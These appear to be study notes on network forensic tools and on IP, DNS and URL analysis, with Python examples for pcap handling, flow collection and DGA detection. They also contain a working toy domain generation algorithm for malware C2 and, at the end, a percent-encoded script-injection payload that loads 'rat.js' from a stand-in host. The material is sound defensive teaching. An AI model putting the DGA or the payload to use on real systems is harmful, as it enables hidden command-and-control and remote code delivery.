[Network Forensic Tools]
Network-related indicators of compromise can be gathered from packet captures, traffic flow data, logs and alerts.
Network traffic must be captured and its data frames decoded before you can analyze it.
To get the traffic to a capture device we use a Switched Port Analyzer (SPAN), also called a mirror port
SPAN/mirror port
allows the copying of ingress and/or egress traffic from one or more source switch ports (or VLANs) to a destination port.
Essentially, it makes a copy of everything coming in or going out of the monitored port(s) and puts it on the duplicate port so you can monitor it there.
This is done in the switch or router configuration (a monitor session with a source and a destination); note that a SPAN port can silently drop packets when the mirrored traffic exceeds the destination port's bandwidth, so a capture taken from it is not guaranteed to be complete.
packet sniffers
[network forensic tools]
once you have a SPAN port configured, you need something listening on it to do the packet sniffing, and that is a packet sniffer
any piece of hardware or software that records data from frames as they pass over the network media, fed by a mirrored port (like a SPAN port) or a TAP device.
TAP (test access point) → a hardware device inserted inline in a cable segment that copies the traffic passing through it to a monitor port,
available in passive versions (optical or electrical splitters that need no power and have no address on the network) and active versions (powered, regenerate the signal, fail-open variants exist); either can collect the data going over any network cable segment.
So you either capture with a hardware TAP, or you run sniffer software on a host connected to a SPAN port.
also consider where you are going to place them in your network.
Generally you want the network sniffer placed inside the firewall, or as close to an important server as possible,
because you want to identify malicious traffic, and specifically the traffic that actually got in through your firewall.
If you put it outside the firewall, you will quickly be overwhelmed by everything the internet throws at your perimeter, most of which the firewall drops anyway.
you don't have to have just one sniffer.
You can put multiple sniffers on your network at different positions.
i.e. you may have one right behind your firewall or router that collects the bulk of the information for the network.
But if there is a single device you're really worried about, you can put a sniffer right in front of that device,
i.e. your database server. That gives you additional monitoring with far less data to look through, just what goes to and from that database server,
so it's a much smaller capture, and you can examine it much more closely.
[tcpdump]
performs a sniffer function to do live packet capture
can also be used afterwards to analyze PCAP data saved from an earlier capture
a command-line packet analyzer: displays TCP/IP and other packets being transmitted or received over the network the computer is attached to
captured packets can be written to a PCAP (packet capture) file for later analysis
Unlike Wireshark, tcpdump is text-based and used from the command line.
ships with macOS and most Linux distributions (on some distributions it has to be installed from the package manager)
need to know which interface you're capturing on (ifconfig / ip link; tcpdump -D lists the interfaces it can capture from)
must run with root/administrative privileges to put the card into promiscuous mode
sudo tcpdump -i [your interface, e.g. "en0" on macOS, "eth0" on Linux]
shows all the connections happening on this network segment, both from my computer and from other hosts whose traffic reaches this interface (add -n to skip reverse DNS lookups, which are slow and themselves generate traffic)
ctrl+c
stops the capture and prints the counts of packets captured, received by filter and dropped by the kernel
sudo tcpdump -i eth0 src [ip]
captures only packets coming from one device; "src [ip]" is shorthand for the BPF primitive "src host [ip]" ("host [ip]" matches either direction, "dst host" the other)
…[prev command] -w [filename].pcap
writes the raw packets to a file on disk instead of printing them;
while it sits listening, every packet from that source that matches the filter is written to the file
sudo tcpdump -r [filename].pcap
reads the saved capture back and prints it in the terminal (root is not actually needed just to read a file)
sudo tcpdump -r [filename].pcap src port 5475
filters the saved capture by source port; -r means read from the saved file, not live data, and the filter expression must come after the options (the same filter syntax works live with -i)
sudo tcpdump -r [filename].pcap src port 5475 -X
-x prints each packet in hex; -X prints hex and ASCII side by side, which is what you want for eyeballing payloads
man tcpdump
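As an added example (not from the lecture notes), here is what `-w`, `-r` and a `src` filter do at the byte level: a minimal pcap writer and reader using only Python's standard library, plus decoding of the Ethernet/IPv4/TCP|UDP headers into the one-line summary tcpdump prints. The frames, MAC addresses and IP addresses are constructed for the example and checksums are left at zero, so the file is readable by `tcpdump -r capture.pcap src host 10.0.0.5` but the packets would not pass a checksum-validating stack.

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4       # libpcap magic for microsecond timestamps
LINKTYPE_ETHERNET = 1
SNAPLEN = 65535

def l4_header(proto, sport, dport, flags=0x02):
    """Minimal UDP (8 bytes) or TCP (20 bytes) header carrying the given ports; checksum 0."""
    if proto == 17:
        return struct.pack("!HHHH", sport, dport, 8, 0)
    # TCP: seq, ack, data offset (5 words), flags (0x02 = SYN), window, checksum, urgent ptr
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 65535, 0, 0)

def ipv4_frame(src, dst, proto, sport, dport, flags=0x02):
    """Ethernet II + IPv4 + L4 header. MAC addresses are placeholders (constructed example)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    l4 = l4_header(proto, sport, dport, flags)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0x4000, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + l4

def encode_pcap(frames):
    """What 'tcpdump -w' does: a 24-byte global header, then a 16-byte record header per frame."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, SNAPLEN, LINKTYPE_ETHERNET)]
    for ts, frame in frames:
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out.append(struct.pack("<IIII", sec, usec, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)

def decode_pcap(data):
    """What 'tcpdump -r' does first: honour the magic's byte order, then walk the records."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a pcap file (magic %r)" % magic)
    frames, pos = [], 24
    while pos + 16 <= len(data):
        sec, usec, incl, _orig = struct.unpack(endian + "IIII", data[pos:pos + 16])
        pos += 16
        frames.append((sec + usec / 1_000_000, data[pos:pos + incl]))
        pos += incl
    return frames

def summarize(frame):
    """Decode Ethernet/IPv4/TCP|UDP headers into (src, sport, dst, dport, proto), tcpdump style.
    Returns None for non-IPv4 frames."""
    if frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    l4 = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[l4:l4 + 4])
    return src, sport, dst, dport, {6: "tcp", 17: "udp"}.get(proto, str(proto))

def filter_src(frames, host):
    """Equivalent of the 'src host X' BPF primitive, applied to already-decoded frames."""
    kept = []
    for ts, frame in frames:
        summary = summarize(frame)
        if summary and summary[0] == host:
            kept.append((ts, frame))
    return kept

def sample_frames():
    """Constructed traffic: start of a TLS handshake, a DNS query, and a SYN to an external port 4444."""
    return [
        (1.000000, ipv4_frame("10.0.0.5", "93.184.216.34", 6, 51234, 443)),
        (1.000250, ipv4_frame("93.184.216.34", "10.0.0.5", 6, 443, 51234, flags=0x12)),
        (2.000000, ipv4_frame("10.0.0.5", "10.0.0.2", 17, 40000, 53)),
        (3.000000, ipv4_frame("10.0.0.7", "203.0.113.9", 6, 40123, 4444)),
    ]

if __name__ == "__main__":
    # Round trip: the same thing as 'tcpdump -w capture.pcap' followed by
    # 'tcpdump -r capture.pcap src host 10.0.0.5'.
    with open("capture.pcap", "wb") as fh:
        fh.write(encode_pcap(sample_frames()))
    with open("capture.pcap", "rb") as fh:
        for ts, frame in filter_src(decode_pcap(fh.read()), "10.0.0.5"):
            print(f"{ts:.6f} {summarize(frame)}")
```

The file it writes opens in Wireshark as well, which is a quick way to confirm that the first 24 bytes really are the global header and that every record starts with the timestamp and two length fields.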
[wireshark]
performs a sniffer function to do live packet capture
a free and open source GUI-based packet analyzer used for network troubleshooting, analysis, software and communication protocol development, and education
open a pcap file (File > Open), or capture live from an interface
the packet-details pane (middle section) after selecting a packet shows the protocol layers decoded for that frame, outermost first:
Frame → capture metadata (timestamp, length, interface); not itself a protocol layer
Ethernet II → layer 2 (data link): source and destination MAC addresses
IP → layer 3: source and destination IP addresses
TCP or UDP → layer 4: ports, flags, sequence numbers
right click → Follow → TCP Stream (or UDP Stream)
reassembles both sides of the conversation in order, e.g. an HTTP request and the HTML of the page that came back
for an FTP data stream, change the "Show data as" format (raw) and use "Save as" to recover the transferred file; note that FTP, Telnet and HTTP are cleartext, so nothing is being decrypted here, only reassembled
for TELNET, the stream shows what the client typed and how the server responded, credentials included
follow stream
[flow analysis]
full packet capture → capture the entire packet, header and payload, for all traffic entering or leaving the network.
this is a huge volume of data and quickly eats up all of our storage.
use flow analysis with a flow collector instead
flow collector → records metadata and statistics about network traffic rather than every frame crossing the network.
flow analysis tools then work on the traffic statistics the collector exported (sampled or 1:1, depending on how the exporter is configured).
This way we capture information about the flow instead of the data itself, saving a lot of space
But we won't have the contents of what went over the network, just information about it
this information can be stored in a database, queried later by different tools, and turned into reports and graphs
which highlight trends and patterns in the traffic being generated.
It lets us alert on anomalies, patterns and triggers that we define.
We can also use visualization tools to
quickly create a map of the network connections and flow patterns,
and identify traffic patterns that reveal bad behavior: beaconing, malware in transit, tunneling, exfiltration and so on
tools
NetFlow
Zeek (formerly Bro)
Multi Router Traffic Grapher (MRTG)
NetFlow
[flow analysis]
a Cisco-developed means of exporting network flow records from routers and switches to a collector, which stores them in a structured database.
one of the first flow formats, and NetFlow v9 became the basis of the IETF standard that everyone now implements, IPFIX (IP Flow Information Export)
A flow is defined as the set of packets that share the same key fields.
i.e. the same source and destination IP address, source and destination port and protocol (the 5-tuple), signifying a session between two hosts; in NetFlow v5 each direction is its own flow.
That is one flow record, and we get statistics about it.
The fields NetFlow records for packets crossing the exporting device include
the input and output interface, the IP version and protocol, the source and destination IP address, the source and destination port, the IP type of service, and the packet and byte counts with the flow's start and end time.
All of this can be gathered, analyzed and viewed visually with different tools.
i.e. the lecture uses a SolarWinds tool to show the NetFlow data of a network graphically, or it can be viewed in text form.
in the text view the flows are listed one by one (flow 1 down to flow 15 in the lecture's example); expanding flow 15 shows the source and destination address, the source port, the destination port, and some basic statistics,
but you don't see the content of any of the packets that made up the flow.
Because of this, NetFlow gives you metadata
but not full packet captures,
so it is not a complete record of what happened, only who talked to whom, when, and how much.
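An added example, not part of the lecture: a small Python flow collector over constructed packet records, aggregating them into unidirectional 5-tuple flows the way a NetFlow v5 exporter would (an inactive timeout closes an idle flow and starts a new record), then answering the question flow data is good for: how many bytes each internal host sent to each external destination. The packet records, the timeout value and the 10.0.0.x internal prefix are assumptions made for the example.

```python
from dataclasses import dataclass

# Constructed packet records: (timestamp, proto, src, sport, dst, dport, bytes).
# Not from a real capture; chosen to show both directions of a TLS session, a DNS
# exchange, and an internal host talking to an external port 4444.
PACKETS = [
    (1.000, "tcp", "10.0.0.5", 51234, "93.184.216.34", 443, 74),
    (1.002, "tcp", "93.184.216.34", 443, "10.0.0.5", 51234, 74),
    (1.010, "tcp", "10.0.0.5", 51234, "93.184.216.34", 443, 517),
    (1.050, "tcp", "93.184.216.34", 443, "10.0.0.5", 51234, 1460),
    (1.051, "tcp", "93.184.216.34", 443, "10.0.0.5", 51234, 1460),
    (2.000, "udp", "10.0.0.5", 40000, "10.0.0.2", 53, 70),
    (2.003, "udp", "10.0.0.2", 53, "10.0.0.5", 40000, 132),
    (3.000, "tcp", "10.0.0.7", 40123, "203.0.113.9", 4444, 60),
    (3.100, "tcp", "10.0.0.7", 40123, "203.0.113.9", 4444, 1460),
    (200.0, "tcp", "10.0.0.7", 40123, "203.0.113.9", 4444, 1460),
]

@dataclass
class Flow:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    first: float
    last: float
    packets: int = 0
    octets: int = 0

    @property
    def key(self):
        return (self.proto, self.src, self.sport, self.dst, self.dport)

def collect_flows(packets, inactive_timeout=60.0):
    """Aggregate packets into unidirectional 5-tuple flow records, NetFlow v5 style.
    When the gap between two packets with the same key exceeds inactive_timeout the old
    record is considered closed and a new one is started, like a collector's inactive timer."""
    records, open_flows = [], {}
    for ts, proto, src, sport, dst, dport, size in sorted(packets):
        key = (proto, src, sport, dst, dport)
        flow = open_flows.get(key)
        if flow is None or ts - flow.last > inactive_timeout:
            flow = Flow(proto, src, sport, dst, dport, ts, ts)
            records.append(flow)
            open_flows[key] = flow
        flow.packets += 1
        flow.octets += size
        flow.last = ts
    return records

def bytes_to_external(flows, internal_prefix="10.0.0."):
    """Octets sent from internal hosts to each external dst:port, largest first.
    This is the question flow metadata answers without any payload: who talked to whom, how much."""
    totals = {}
    for f in flows:
        if f.src.startswith(internal_prefix) and not f.dst.startswith(internal_prefix):
            totals[(f.dst, f.dport)] = totals.get((f.dst, f.dport), 0) + f.octets
    return sorted(((dst, port, octets) for (dst, port), octets in totals.items()),
                  key=lambda row: row[2], reverse=True)

if __name__ == "__main__":
    flows = collect_flows(PACKETS)
    for f in flows:
        print(f"{f.proto} {f.src}:{f.sport} -> {f.dst}:{f.dport} "
              f"pkts={f.packets} bytes={f.octets} dur={f.last - f.first:.3f}s")
    print(bytes_to_external(flows))   # port 4444 destination tops the list
```

Nothing here knows what was inside the 2980 bytes sent to port 4444; that is exactly the limit of flow data the notes describe, and the reason the next step is a targeted packet capture in front of 10.0.0.7.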
Zeek
[flow analysis]
if you want the best of both worlds,
metadata plus enough content to reconstruct what actually happened
a passive network monitor (sensor) that sits on a SPAN or TAP like a sniffer, but instead of storing every packet it parses each connection up through the application protocol and writes structured logs (conn.log, dns.log, http.log, ssl.log, files.log, ...) holding the details that matter: URIs, DNS queries and answers, TLS certificates, file hashes
it can also extract files from the traffic and, when configured to, write selected packets to pcap, so you keep full detail for traffic of interest without storing everything; it does not sample, it sees every packet and decides what to record
This cuts storage and processing requirements compared to full packet capture while keeping far more context than NetFlow, and puts all of it into a single consistent format.
One of the great things about Zeek is that it normalizes the data and stores it as tab-delimited or JSON-formatted text files.
This lets you use it with lots of other tools.
i.e. because the log is normalized, it can be imported into another tool for visualization, searching and analysis.
In the lecture's example, the Zeek log is imported into Splunk and searched for specific information during the analysis of a potential incident.
MRTG
[flow analysis]
a tool that creates graphs of traffic volume
through the network interfaces of routers and switches, by polling those appliances over SNMP (the Simple Network Management Protocol) for their interface byte counters; it graphs throughput per interface, not individual flows.
(the lecture shows a set of MRTG graphs, one per interface)
Now, what is useful about this?
you can see patterns emerging.
i.e. in the top graph, the router/firewall interface, where is the big spike in traffic?
There is a big spike between 2:00 and 4:00 am. Is that normal? Maybe, maybe not, but it is something to analyze further: a spike at that hour could be routine, like offsite backups run during off-peak hours, sending our data to the offsite facility.
Or the server could be infected with malware that waits until 2:00 to 4:00 am, when everyone is home asleep, to send the data back to the attacker as part of data exfiltration.
We can't tell which from the graph alone, but it tells us to zero in on 2:00 to 4:00 am and figure out what that additional traffic was and why.
Based on this, we might form the hypothesis that data exfiltration is happening.
In that case, we would set up a network sniffer in front of this server (or pull the flow records for it)
to see what traffic is leaving and where it's going.
From that we can dive deeper to decide whether it was known good, such as a backup, or known bad, such as an attacker.
[IP and DNS Analysis]
many intrusions rely on C2 servers to download additional attack tools and exfiltrate data.
Therefore one particular area of interest to a cybersecurity analyst is analyzing traffic for requests to external hosts.
Identifying these usually relies on analysis of IP addresses and their DNS resolutions.
If you subscribe to a service that provides reputation-based feeds, most of these are based on IP and DNS as well.
In the old days, malware was configured with a specific static IP address or DNS name hard-coded into it.
So when that malware was downloaded and installed, it would call out to that static IP or DNS name.
Because of that, we could develop what we call
a known-bad IP address:
an IP address or range of IP addresses that appears on one or more block lists; these block lists were basically a way to play whack-a-mole.
An attacker would start a new domain, we would find out it was bad, we would put it on the block list.
They would start another domain, and we kept doing this over and over.
This is how reputation-based threat intelligence builds an IP or URL block list: we find something bad, we add it to the list.
i.e. the lecture's block list shows an entry for bol.com.br, listed as a RAT associated with that DNS name.
That lets us block it, but if they change the domain name we have to go find that and block it too.
As defenders we try to outsmart the attackers, but every time we find a way to block them, they find a way around it.
Because defenders started using block lists of known-bad IPs and known-bad domains, attackers started using domain generation algorithms to get past them
DGA
[IP and DNS Analysis]
a method used by malware to evade block lists by generating the domain names for its command and control infrastructure dynamically.
Instead of a static IP or a static name, the malware computes a list of many candidate names and works through them until we have blocked them all, at which point it simply generates more.
This repeats over and over, dynamically.
Let's talk about how this works. There are five steps for an attacker to use.
1 attacker sets up one or more dynamic DNS (DDNS) servers or accounts
This lets them create and change domain records on the fly.
They sign up with a service using fake payment details or fake credentials, or use a host that doesn't care about illicit activity.
2 malware code implements a DGA to create a list of new domains
the malware itself contains the DGA.
The DGA is used to create a list of new domain names.
The way this works is
it's an algorithm seeded with some value,
and everyone who has the algorithm and knows the seed essentially holds the same key and can reproduce the same list.
So if the malware has it and the attacker's server has it, both produce the same sequence of names and can jump to the same one each time.
The seed can be a secret constant, a random number agreed in advance, or something time-based.
i.e. the current date is a common seed.
Run through the algorithm, the seed produces cryptic strings of numbers and letters that become the domain names.
That way they look random and won't already be on your block list.
3 a parallel DGA is used to create name records on the DDNS service
The DDNS side needs the same algorithm so the two match up,
and if both use the same seed they produce the same names.
4 the malware tries a selection of the domains it has created to connect to C2
The attacker only registers a few of the generated names, so the malware tries several until one resolves; this also tolerates small clock or seed differences between the two sides.
5 C2 server communicates with a new seed for the DGA to prevent being blocked
That way they can change the DGA output if you reverse engineered it and started blocking (or sinkholing) the predicted names.
This way they avoid being blocked and continue operating.
It's a dynamic list that is constantly changing.
Because the names, and usually the IP addresses behind them, change constantly, this is often described alongside fast flux networks.
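An added toy example to make steps 2 through 5 concrete (not code from the lecture, and not any real malware family's algorithm): both sides derive the day's candidate list from a shared seed, the implant walks the list until a name resolves, and a reseed from the C2 changes the next list. The seed string, the date, the three TLDs and the `dns_table` dict standing in for a resolver are all assumptions made for the example.

```python
import hashlib
from datetime import date, timedelta

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
TLDS = ("com", "net", "org")          # assumed; real families rotate many more
LABEL_LEN = 10

def dga(seed, day, count=20):
    """Steps 2 and 3: derive `count` domains for ISO date `day` from a shared secret seed.
    Anyone holding seed + algorithm (implant and operator alike) reproduces the same list."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day}|{i}".encode()).digest()
        # map digest bytes to a-z0-9: slightly skewed, but deterministic is all a DGA needs
        label = "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:LABEL_LEN])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains

def beacon(candidates, dns_table):
    """Step 4: try candidates in order until one resolves. `dns_table` stands in for DNS.
    Returns (domain that resolved or None, number of NXDOMAIN answers produced on the way);
    those misses are the noise defenders look for."""
    misses = 0
    for name in candidates:
        if name in dns_table:
            return name, misses
        misses += 1
    return None, misses

def reseed(old_seed, nonce):
    """Step 5: the C2 pushes a nonce; both sides derive the next seed from it, so a
    defender who reverse engineered the old seed's names is back to square one."""
    return hashlib.sha256(f"{old_seed}:{nonce}".encode()).hexdigest()[:16]

if __name__ == "__main__":
    seed, today = "example-seed", date(2024, 5, 1)        # assumed values
    implant = dga(seed, today.isoformat())
    operator = dga(seed, today.isoformat())              # identical list on the attacker's side
    assert implant == operator
    dns_table = {operator[4]: "203.0.113.9"}             # operator registers just one of today's names
    print("beacon result:", beacon(implant, dns_table))  # (operator[4], 4): four NXDOMAINs first
    print("tomorrow:", dga(seed, (today + timedelta(days=1)).isoformat())[:3])
    print("after reseed:", dga(reseed(seed, "c2-nonce-7"), today.isoformat())[:3])
```

Two things to notice: the operator never has to contact the implant to tell it today's name, and a defender who recovers the seed from a sample can precompute the same list and register or sinkhole the names first, which is why step 5 exists.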
fast flux network
[IP and DNS Analysis]
a method used by malware to hide the presence of C2 infrastructure by continually changing the host IP addresses in a domain's DNS records (very short TTLs, with many compromised hosts acting as front-end proxies), so that blocking any one IP achieves little.
Pairing that with a DGA so the domain names change too is sometimes called domain flux; everything we just discussed about DGAs is what the lecture treats as part of a fast flux network.
detect and mitigate a DGA
[IP and DNS analysis]
what can we do to detect a DGA?
1 if you start seeing a lot of call-outs from your systems to domain names that look like random strings.
i.e. you see a random series of letters and numbers followed by .com.
That is a strong sign of computer-generated labels: a consonant-to-vowel ratio, a mix of digits, or an entropy that just doesn't look like a word.
Most people wouldn't buy a domain name like A1ZWBR93.com.
They would buy diontraining.com or comptia.org or something like that.
So if you see things like this, it's usually a sign that something malicious is going on.
2 if you start seeing a high rate of NXDOMAIN responses in your DNS resolver logs,
NXDOMAIN error
have you ever gone to a website and got a message like "This site can't be reached. DNS_PROBE_FINISHED_NXDOMAIN"?
essentially, you tried to look up that domain name and the resolver reported that it does not exist.
that's the resolver telling you there is no record for that name.
With a DGA, only a few of the generated names are ever registered, so an infected host produces a burst of NXDOMAIN answers while it walks the list until one resolves; one client generating many NXDOMAINs for never-before-seen names is the pattern to hunt for.
Now, how do you mitigate these DGAs?
use a secure (filtering) recursive DNS resolver.
A recursive resolver is one trusted DNS server that does the work of walking the DNS hierarchy on the client's behalf, contacting the root, TLD and authoritative servers to hunt down the IP address and return it.
So instead of letting every host resolve names through whatever DNS server it likes, point them at a trusted resolver that you control or subscribe to (a protective DNS service), and block outbound port 53 to anything else so the malware can't bypass it.
If that resolver maintains knowledge of known DGA families and newly observed domains, it keeps blocking (or sinkholing) those lookups for you and protects your network, and its logs are where the NXDOMAIN data above comes from.
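An added example (not from the lecture) of the two detections above in Python: a heuristic that scores a domain's registrable label on digit mix, vowel ratio, vowel-free runs and entropy, and a per-client NXDOMAIN rate computed from resolver log lines. The log lines, their field layout `timestamp client query rcode`, the mini public-suffix list and the thresholds are constructed for the example; a real deployment should tune them against its own baseline, since short legitimate labels such as bbc.co.uk also have few vowels.

```python
import math
import re

VOWELS = set("aeiou")
SUFFIXES = ("co.uk", "com.br", "com", "net", "org")   # assumed mini public-suffix list

# Constructed resolver log (not real data), one query per line: <timestamp> <client> <query> <rcode>
DNS_LOG = """\
2024-05-01T02:13:04 10.0.0.7 a1zwbr93.com NXDOMAIN
2024-05-01T02:13:05 10.0.0.7 q8ztbv6mkd.net NXDOMAIN
2024-05-01T02:13:06 10.0.0.7 zx9wqp4rlt.com NXDOMAIN
2024-05-01T02:13:07 10.0.0.7 k3vrtq8zpw.org NXDOMAIN
2024-05-01T02:13:08 10.0.0.7 m7xzqtb2vn.com NXDOMAIN
2024-05-01T02:13:09 10.0.0.7 n2qwxk5tzr.net NOERROR
2024-05-01T02:14:00 10.0.0.5 diontraining.com NOERROR
2024-05-01T02:14:01 10.0.0.5 comptia.org NOERROR
2024-05-01T02:14:02 10.0.0.5 bbc.co.uk NOERROR
2024-05-01T02:14:03 10.0.0.5 wireshark.org NOERROR
"""

def registered_label(domain):
    """Label just left of the public suffix: 'www.diontraining.com' -> 'diontraining'."""
    name = domain.lower().rstrip(".")
    for suffix in sorted(SUFFIXES, key=len, reverse=True):
        if name.endswith("." + suffix):
            name = name[: -len(suffix) - 1]
            break
    return name.split(".")[-1]

def entropy(s):
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def looks_generated(domain):
    """Heuristic: digits mixed in, few vowels, a long run with no vowel, or high entropy.
    Two or more hits flags the label as machine-generated."""
    label = registered_label(domain)
    if not label:
        return False
    digit_ratio = sum(c.isdigit() for c in label) / len(label)
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    longest_run = max(len(run) for run in re.split(r"[aeiou]", label))
    hits = sum([digit_ratio > 0.2, vowel_ratio < 0.2, longest_run >= 5, entropy(label) > 3.3])
    return hits >= 2

def triage(log_text):
    """Per client: queries, NXDOMAIN answers, and queries whose name looks generated."""
    stats = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, query, rcode = line.split()
        row = stats.setdefault(client, {"queries": 0, "nxdomain": 0, "dga_like": 0})
        row["queries"] += 1
        row["nxdomain"] += int(rcode == "NXDOMAIN")
        row["dga_like"] += int(looks_generated(query))
    return stats

def suspicious_clients(stats, min_queries=5, nx_ratio=0.5):
    """Clients with enough queries and an NXDOMAIN share at or above nx_ratio."""
    return sorted(c for c, r in stats.items()
                  if r["queries"] >= min_queries and r["nxdomain"] / r["queries"] >= nx_ratio)

if __name__ == "__main__":
    stats = triage(DNS_LOG)
    for client, row in stats.items():
        print(client, row)
    print("suspicious:", suspicious_clients(stats))   # ['10.0.0.7']
```

The two signals reinforce each other: 10.0.0.7 is flagged both because five of its six lookups failed and because all six names score as generated, whereas a host with one typo'd lookup trips neither threshold.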
[URL Analysis] 1/
URLs can encode an action or data that is then submitted to the server during the request.
When you conduct a URL analysis,
this is an activity performed to identify whether a link is already flagged on an existing reputation list
and, if not, to identify what malicious script or activity might be encoded within it.
important because encoding can happen inside the URL,
so you need the right tools to resolve the percent encoding that might be there, assess what redirection the URL might perform (follow the 30x chain without a browser),
and show the source code of any scripts the URL calls without executing them.
do all of this inside a sandbox environment so you don't infect your own machine; never open the link in your everyday browser.
[URL Analysis] 2/
diontraining.com/upload.php?post= [and then this long thing]
we'll come back to this URL several times, but before we start analyzing it we need to understand three basics of URL analysis:
HTTP methods
HTTP response codes
percent encoding
HTTP methods
[URL Analysis]
a set of request methods that indicate the desired action to be performed
for a given resource.
a resource is essentially something on the server
It could be a webpage, an image, a script, a file, etc.
A request contains
a method, a resource (the path from the URL), an HTTP version number, headers, and, for methods like POST and PUT, a body.
The browser assembles all of that when you enter a URL.
So when you go to diontraining.com, you are actually sending an HTTP request that says
"GET / HTTP/1.1" with a Host: diontraining.com header: get me the page and send it back with headers and a body. And that's what the server does.
There are many different methods
GET → the principal method, used to retrieve a resource; any data it sends rides in the URL's query string.
So when you go to diontraining.com, you are using a GET saying, "Get me the index page of that website."
POST → used to send data to the server, in the request body, for processing by the requested resource.
Caveat: in the URL shown earlier, post= is just the name of a query parameter, not the HTTP method. A URL typed into the address bar or clicked from a link is sent with GET; the request only becomes a POST if a form or script sends it that way.
Either way, in that example upload.php is the script on the server that would process whatever was submitted.
PUT → creates or replaces the requested resource.
So if I PUT a file to the server, I'm uploading it there and overwriting what exists, which is why PUT being enabled on a web server is a finding in its own right.
DELETE → used to remove the requested resource.
So if I wanted to delete a file,
HEAD → retrieves only the headers for the resource and ignores the body.
So if I send a HEAD request, I only get the status line and headers of the HTTP response.
This is often used by a penetration tester when doing a banner grab,
because all you want is information about the server (the Server header, content type, last-modified date and so on), not the page itself.
[URL Analysis] 3
data can be submitted via a URL
delimited from the path by the question mark character.
In the earlier upload.php example, everything after the question mark (post=...) is the query string.
Caveat: post= there is a parameter name the script chooses to look for; it does not change the HTTP method.
query parameters
are formatted as one or more name=value pairs, with an ampersand separating each pair
So if you think back to our Google hacking lesson,
we used the ampersand to join value pairs together as we sent them to Google to do a specific search.
the # (hash, i.e. the fragment identifier)
indicates a fragment or anchor ID; the browser keeps it, and it is not sent to or processed by the web server.
If you've ever coded HTML, you'll know an anchor lets you name a particular part of the page.
For instance, if a page is longer than fits on the screen,
say a very long book in one webpage, anchors mark where each chapter starts.
Clicking a link at the top of the page then jumps straight down to that portion of the page.
Again, it's not processed by the server, so it never appears in server logs and server-side filters never see it, but you should still look for it in URL analysis: client-side JavaScript that reads location.hash and writes it into the page turns the fragment into a DOM-based XSS injection point.
HTTP response codes
[URL analysis]
an HTTP response code is a header value returned by the server when the client requests a URL.
these codes are three-digit numbers
that tell the client something the server wants it to know; the first digit gives the class.
200
indicates a successful request (GET or POST), meaning you asked for the page and it came back successfully.
201 indicates that your PUT (or POST) request succeeded in creating a resource.
300 series
indicate a redirect by the server.
a 301 is a permanent redirect, used when we move a webpage from one location to another (302 is the temporary version).
That way search engines know to transfer everything they know about the old page to the new page; in URL analysis, a chain of redirects is where a link's real destination hides.
400 series
indicate an error in the client's request,
and there are some specific ones you should know.
400 indicates that the request could not be parsed by the server.
401 indicates that the request did not supply (valid) authentication credentials.
403 indicates that the request did not have sufficient permissions to access the resource.
404 indicates that the client requested a non-existent resource.
500 series
mean there is some kind of server-side issue.
Everything up to this point was the client not getting what it wanted.
Now we have server-side issues.
500 indicates a general error on the server side of the application, which is also what a crashed script or a successful injection often produces.
502 indicates a bad gateway; you'll often see this when the server is acting as a proxy and the upstream server returned an invalid response.
503 indicates the server is overloaded or down for maintenance, causing service unavailability.
504 indicates a gateway timeout: an upstream server did not respond in time.
percent encoding
[URL analysis]
a mechanism to encode eight-bit characters that have a specific meaning in the context of a URL, as a percent sign followed by two hex digits.
also known as URL encoding
a URL can contain unreserved and reserved characters from the ASCII set.
unreserved characters
letters and numbers, A through Z, 0 through 9,
and the dash, the period, the underscore and the tilde.
reserved characters
special characters like the colon, the forward slash, the question mark, the hash, the square brackets, the at sign, exclamation, dollar sign, ampersand, single quote, parentheses, star, plus, comma, semicolon, and equals.
You can use these inside a URL.
There's nothing wrong with using them, but they have a special meaning where they act as delimiters, so they must be percent-encoded when they appear as data.
a URL can not contain unsafe characters
things like the null character, carriage return, line feed, end of file, tab, space, and characters like the backslash, the less-than sign, the greater-than sign, and the curly brackets.
percent encoding allows a user agent to submit any reserved or unsafe character, or any binary data for that matter, to the server within a URL.
So if I want to send a space, I can do that by encoding it as %20.
here's where I need to bring up the warning
percent encoding can be misused to obfuscate the nature of a URL.
Attackers encode characters that did not need encoding (even unreserved ones) and submit malicious input as a script or binary, or use encoded ../ sequences to perform directory traversal, hoping that a filter inspects the encoded form while the application acts on the decoded one.
So when you see percent encoding, you should think, "Something may be hidden here. I need to decode it and look further."
As an analyst, whenever I see that, or on the exam, anytime you see that, you need to have the hair on the back of your neck standing up and going, "I need to look further into this. There's probably something here."
double encoding
[URL Analysis]
some really tricky attackers double encode,
by percent-encoding the percent sign itself (%25), so that %3C becomes %253C.
A filter that decodes once sees a harmless-looking %3C rather than <, while a back end that decodes again acts on the real character; so when you look at the URL you won't see something like %20 even though the thing is percent encoded underneath.
for the exam, they won't do the double encode,
percent encodings
%3C = <
%3E = >
%20 = space
%3D = =
%22 = "
%3A = :
%2F = /
%25 = %
%3Cscript%20SRC%3D%22http%3A%2F%2Fabc123.com%2Frat.js%22%3E%3C%2Fscript%3E
<script SRC="http://abc123.com/rat.js"></script>
